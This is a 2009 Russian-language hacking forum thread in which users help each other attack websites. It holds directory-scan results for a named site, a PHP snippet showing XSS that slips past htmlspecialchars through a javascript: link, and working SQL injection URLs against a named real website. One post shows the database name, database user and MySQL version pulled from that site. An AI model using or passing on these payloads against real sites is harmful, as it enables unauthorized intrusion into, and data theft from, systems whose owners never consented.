 |
|
12.11.2009, 21:28
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.
Последний раз редактировалось Ins3t; 12.11.2009 в 21:31..
|
|
|
12.11.2009, 21:29
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Сообщение от Krist_ALL
http://security-digger.org/
или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392
ну вот просканировал я директори, получилось вот что:
Found [403]: mtl-consultants.com/.htaccess
Found [403]:site.com/.htaccess~
Found [403]: site.com/.htpasswd
Found [403]: site.com/.htpasswd~
Found [200]: .com/_notes/
Found [403]: .com/cgi-bin/
Found [403]: .com/cgi-sys/
Found [301]: .com/cpanel/
Found [200]: .com/email/
Found [301]: .com/images
Found [403]: .com/mailman
Found [301]: .com/pipermail
Found [301]: .com/webmail
Found [403]: .com/~root
а что дальше? объясни плиз
|
|
|
|
12.11.2009, 21:31
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Сообщение от Ins3t
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter
|
|
|
|
12.11.2009, 21:31
|
|
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
С нами:
8777275
Репутация:
3
|
|
как обходится htmlspecialchars??
|
|
|
|
12.11.2009, 21:33
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 20
С нами:
8681832
Репутация:
0
|
|
n-sider.com
вот этот ресурс...
статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
|
|
|
|
12.11.2009, 21:37
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о
1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:
PHP код:
<?php
$a = "javascript:document.write('<script>alert(0)</script>');";
$data = htmlspecialchars($a);
echo "<a href=$data>Tikni</a>";
?>
просто запустите и удивитесь сильно
PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте
Последний раз редактировалось Pashkela; 12.11.2009 в 21:48..
|
|
|
|
12.11.2009, 21:37
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от [x60]unu
Ну как бэ от ордер бай не всегда польза есть, часто приходится в ручную все гонять  ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит
+and+substring(version(),1,1)=4
|
|
|
|
12.11.2009, 21:38
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
С нами:
8842000
Репутация:
43
|
|
Сообщение от fng
n-sider.com
вот этот ресурс...
статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2--
[+] Current Database : nsider
[+] Database User : nsider_mysql@apache2-fungi.pistons.dreamhost.com
[+] MySQL Version : 5.0.67-userstats-log
|
|
|
|
12.11.2009, 21:39
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2fng,
Код:
http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens
вывод в свойставх картинки |
|
|
|
12.11.2009, 21:45
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 20
С нами:
8681832
Репутация:
0
|
|
спасибо парни, вроде так же делал, не заметил может вывод...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
